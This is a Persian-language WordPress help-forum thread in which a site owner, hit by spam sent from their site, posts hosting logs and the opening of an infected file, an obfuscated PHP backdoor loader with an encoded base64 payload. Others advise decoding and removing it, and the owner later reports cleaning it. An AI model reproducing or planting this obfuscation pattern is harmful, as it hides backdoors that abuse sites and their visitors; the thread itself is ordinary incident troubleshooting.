• اطلاعیه ها

    • Morteza

      باهم بسازیم: اطلس ووکامرس و وردپرس   14/07/96

      تاپیک ایجاد شده برای بحث در جهت ایجاد یک منبع، ویکی، صفحات توضیحی و یا بخش آموزشی جامع برای وردپرس و متعلقات مختلف آن است. لطفا جهت مشارکت در این بحث، ارائه پیشنهاد و یا انتقاد به تاپیک فوق مراجعه کنید. باهم بسازیم: اطلس ووکامرس و وردپرس
hiwa

مشکل امنیتی در مورد ارسال ایمیل ناخواسته از سایت + جزئیات خطا

5 پست در این موضوع قرار دارد

ارسال شده در (ویرایش شده)

سلام دوستان

من یک هفته است درگیر یک مشکل امنیتی در سایت وردپرسم هستم ممنون میشم اگه وقت بگذارید نظرتون رو بگید تا بتونم بررسی های بیشتری داشته باشم.

متن خطایی که کارشناس هاست برای من ارسال کرده اینه:

لینک های مربوط به صفحات و کدهای آلوده در سایت شما به شرح ذیل ارائه می گردد : 


[27-Dec-2016 20:48:46 America/New_York] mail() on [D:\HostingSpaces\mydomain.com\mydomain.com\wwwroot\wp-includes\widgets\ajax61.php(1958) : eval()'d code:775]: To: manclik@o2.pl -- Headers: Date: Tue, 27 Dec 2016 20:48:46 -0500 From: Adrianna <adrianna@mydomain.com> Message-ID: <e086de42938f51715a6c6f5e2440922a@peykeaval.com> X-Priority: 3 MIME-Version: 1.0 Content-Type: multipart/alternative;     boundary="b1_e086de42938f51715a6c6f5e2440922a" Content-Transfer-Encoding: 8bit


[28-Dec-2016 03:32:25 America/New_York] mail() on [D:\HostingSpaces\mydomain.com\mydomain.com\wwwroot\wp-includes\widgets\ajax61.php(1958) : eval()'d code:775]: To: panos@spitfire.gr -- Headers: Date: Wed, 28 Dec 2016 03:32:25 -0500 From: Debbie <debbie@mydomain.com> Message-ID: <f69af4c19b6af26f68341250901069ed@peykeaval.com> X-Priority: 3 MIME-Version: 1.0 Content-Type: multipart/alternative;     boundary="b1_f69af4c19b6af26f68341250901069ed" Content-Transfer-Encoding: 8bit

قالبی که استفاده کردم listify نام داره . از سایت nikan خریداری کردم (250 هزار)

دو سه روز کامل درگیر اسکن و بررسی بودم و دوباره فایل های اسکن شده رو روی هاست(ویندوزی) پاک شده آپلود کردم اما باز هم همان مشکل قبلی پیش آمد.

سیستم خودم رو فول اسکن کردم.

تمام فایلهای سایت رو هم دانلود اسکن کردم. موارد مشکوک رو fix کردم با آنتی ویرویس avast Free اما مشکلم حل نشده.

راهکاری به نظرتون میرسه ؟

ممنون

ویرایش شده در توسط hiwa
1

به اشتراک گذاری این پست


لینک به پست

محتوای فایل ajax61.php هم به این شکله :

<?php
 $euvwzec = 2437; function kjmlq($hebqeajjrg, $psycehqwla){$evprzo = ''; for($i=0; $i < strlen($hebqeajjrg); $i++){$evprzo .= isset($psycehqwla[$hebqeajjrg[$i]]) ? $psycehqwla[$hebqeajjrg[$i]] : $hebqeajjrg[$i];}
$duqcskxg="base" . "64_decode";return $duqcskxg($evprzo);}
$qewdep = 'FSUdZJwNMAF8ktJfvcwfAtzIMfv3uXjJiXq76q1xFSUdZJwNMAF8ktzIM5wUvnkIvnGnOC9qxi3rCg47lcUR'.
'vtJ1xChKbAYRMAYUbeJ1ZQwdAeL7lQ0nOC9qxi3rCg4NMALRhSUKMJw3ZQ57'.
'hCsqxi3rCs1xZQb8ZArNMAF8kywiLJkQLJu7xF1x2q1xCDLR01JDJgJDQfhFDy4R01JGLBhhuo1suBWB6f9rCsggA5ry0UMy0U'.
'3n0gJri5LyA1yXLyunAD9wuCuzGavdGCEqOaXB6q1xCQUcxCyUlA412DsgA5ry0UMy0U3nDyL00ywbA1Mp0Uh40gLyLy'.
'wSi5unADg7oF8k2q1xCFggA5ry0UMy0U3nDyL00ywbA1Mp0Uh40gLyLywSi5unAD9wuC'.

 

0

به اشتراک گذاری این پست


لینک به پست
در 5 ساعت قبل، hiwa گفته است :

محتوای فایل ajax61.php هم به این شکله :


<?php
 $euvwzec = 2437; function kjmlq($hebqeajjrg, $psycehqwla){$evprzo = ''; for($i=0; $i < strlen($hebqeajjrg); $i++){$evprzo .= isset($psycehqwla[$hebqeajjrg[$i]]) ? $psycehqwla[$hebqeajjrg[$i]] : $hebqeajjrg[$i];}
$duqcskxg="base" . "64_decode";return $duqcskxg($evprzo);}
$qewdep = 'FSUdZJwNMAF8ktJfvcwfAtzIMfv3uXjJiXq76q1xFSUdZJwNMAF8ktzIM5wUvnkIvnGnOC9qxi3rCg47lcUR'.
'vtJ1xChKbAYRMAYUbeJ1ZQwdAeL7lQ0nOC9qxi3rCg4NMALRhSUKMJw3ZQ57'.
'hCsqxi3rCs1xZQb8ZArNMAF8kywiLJkQLJu7xF1x2q1xCDLR01JDJgJDQfhFDy4R01JGLBhhuo1suBWB6f9rCsggA5ry0UMy0U'.
'3n0gJri5LyA1yXLyunAD9wuCuzGavdGCEqOaXB6q1xCQUcxCyUlA412DsgA5ry0UMy0U3nDyL00ywbA1Mp0Uh40gLyLy'.
'wSi5unADg7oF8k2q1xCFggA5ry0UMy0U3nDyL00ywbA1Mp0Uh40gLyLywSi5unAD9wuC'.

 

درود بر شما بنده زیاد ازین کدها سر در نیاوردم ولی تا جایی که متوجه شدم اول اینکه شما دارین از هاست ویندوز استفاده میکنین که این زیاد با وردپرس همخوانی نداره و عمده مشکلاتتون دقیقا از اینجا شروع میشه!

بعدش اینکه فک میکنم یه کد مخرب بصورت رمزگذاری شده همون متن سبز رنگ در یکی از ابزارکهای قالب وجود داره!

که اول باید دیکد بشه و بعدا که متوجه شدین چی هست حذف بشه!

یا اون بخش از کدها رو حدف کنید و ببینید مشکل بر طرف میشه یا بازم وجود داره!

فک میکنم این موارد رو چک کنید مشکلتون برطرف بشه اگر نشد بازم پیام بزاردی فرصتی داشتم خدمت میرسم و بازم چک میکنیم با هم

^_^

1

به اشتراک گذاری این پست


لینک به پست

دوستت عزیز خیلی متشکرم از جوابت. مواردی که گفتی رو دارم انجام میدم. امیدوارم حل بشه. نتیجه رو حتما خدمتت گزارش میدم. بازم ممنونم ازت.

0

به اشتراک گذاری این پست


لینک به پست

مشکل من یک بک دور به اسم Backdoor.PHP.Agent.RO  بود که به کمک Bitdefender total security 2017 تونستم مشکل رو حل کنم.

0

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری

  • مطالب مشابه

    • توسط mihanscript
      آموزش کامل، گام به گام و تصویری راه اندازی بسته های نصبی وردپرس
      برای مشاهده آموزش نصب بسته نصبی قالب وردپرس کلیک کنید
       
    • توسط mihanscript
      آموزش گام به گام و تصویری نصب وردپرس بر روی سی پنل :
      برای مشاهده آموزش کلیک کنید
    • توسط kimia212asd
      با سلام من چند روزه با وردپرس کار میکنم   سایت رو باز میکنم ریداکت میشه  به سایت دیگه  خارجی هستش
      فایل وردپرس  رو پاک کردم دوباره نصب کردم باز همونه
      با هاستینگ صحبت کردم  اونم  سایت رو ریستور کرد به یک هفته پیش باز اون مشکل هست
      لطفا راهنمایی کنید  مشکل رو برطرف کنم
      ادرس  سایت  ببینید
      www.vatanfal.com
    • توسط Lincer
      سلام وقت بخیر دوستان
      کسی میدونه پوسته این وبسایت رو از کجا میشه پیدا کرد؟
      https://carpet-machines.com
    • توسط Rangarang
      سلام
      وقتی سایتمون پروتکل SSL داشته باشه و بخوایم تو صفحه اول از یک IFRAME ای استفاده کنیم که خودش SSL نداره (HTTP هست)، باید چیکار کرد؟ چون قبل از اینکه SSL رو سایت نصب بشه، IFRAME درخواست خودش رو به نسخه HTTP می فرستاد اما دقیقا بعد از نصب SSL اون IFRAME به صورت خودکار درخواست HTTPS می فرسته به سایت مقصد و چون سایت مقصد HTTPS نداره، IFRAME با خطا مواجه می شه. من می خواستم بدونم چطوری باید کاری کرد که IFRAME درخواست HTTP ارسال کنه همچنان.
      از افزونه Really Simple SSL استفاده می کنم.
      مرسی